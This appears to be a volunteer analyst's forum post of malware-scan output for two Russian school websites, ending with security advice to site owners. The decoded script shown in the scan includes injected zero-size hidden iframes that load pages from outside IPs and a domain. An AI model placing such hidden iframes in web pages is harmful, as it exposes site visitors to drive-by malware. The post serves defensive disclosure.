Error for the original scansite: error
-www.150-monino2.edusite.ru/
status: (referer=-http:/XXX/web?q=puppies)saved 29164 bytes 54bdc21874d239391ae95fca66dc2b7e18ede260
info: [script] -www.150-monino2.edusite.ru/menus.js
info: [iframe] -188.165.163.235/index/api.php?sid=9H20O5TRHrR0aFL
info: [img] -www.150-monino2.edusite.ru/images/gerbshkolyi.png
info: [img] -www.150-monino2.edusite.ru/images/p47_izobrajenie.jpg
info: [img] -www.150-monino2.edusite.ru/scin/logo.jpg
info: [img] -www.150-monino2.edusite.ru/scin/sp.gif
info: [script] -rusobr.ru/count.php?sid=4719
info: [img] -rusobr.ru/banners/j120x60_01.jpg
info: [img] -rating.rosnou.ru/images/baner160-60.gif
info: [img] -www.150-monino2.edusite.ru/images/p81_bar7.gif
info: [iframe] -www.150-monino2.edusite.ru/_ext/comment.php?47
info: [img] -www.150-monino2.edusite.ru/_ext/pic.php
info: [decodingLevel=0] found JavaScript
error: undefined variable parseStylesheets
error: undefined function parseStylesheets
info: DecodedIframe detected
info: [var g1] URL=-www.150-monino2.edusite.ru/
info: [var newurl] URL=-www.150-monino2.edusite.ru/
info: [iframe] -211.227.18.92/page1.php
info: [iframe] -combach.com/gl1_2.php
info: [iframe] -211.216.76.177/tag1.php
info: [decodingLevel=1] found JavaScript
error: line:15: SyntaxError: missing ; before statement:
error: line:15: <iframe width="0" height="0" board="0" src="-http:/211.216.76.177/tag1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/211.227.18.92/page1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/combach.com/gl1_2.php"></iframe>
error: line:15: ......................................................................................^
file: 54bdc21874d239391ae95fca66dc2b7e18ede260: 29164 bytes
file: 4075a225408928cf3042cd815bb2abce54fc2444: 938 bytes
For the C-grade detections mentioned in the scan results above, 2 vulnerable jQuery libraries were detected:
https://retire.insecurity.today/#!/scan/6100a47a9e6b10fed97d3fe3c5351397cc1d0a2e3026c445306a86dfbed95849Look for results here:
https://www.htbridge.com/ssl/?id=MfD8LzCK"The HTTP version of the website does not redirect to the HTTPS version. We advise to enable redirection".
Script error
[embed] -xenia.edusite.ru/js/fancybox/
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined function $
file: 1cf3d47b5ccb7cb6e9019c64f2a88d03a64853e4: 48706 bytes
&
info: [script] -xenia.edusite.ru/scin/my.js
info: [decodingLevel=0] found JavaScript
error: undefined variable $
error: undefined function $
file: d989417ee36e7f01ad680a230f974d69253df8a5: 10733 bytes
&
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [iframe] -xenia.edusite.ru/js/highslide/
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete)
To land at an improved website security infrastructure the use of 'best policies' is advised.
Everybody may prosper, website admin(s), hoster, and end-users alike.
That is why I do this. Iif only those responsible would take found hints and would follow recommendations proposed,
we would arrive at a much more secure world, where mutual trust could again be spelled with a big T.
yours truly,
Damian aka polonus (volunteer website security analyst and website error-hunter)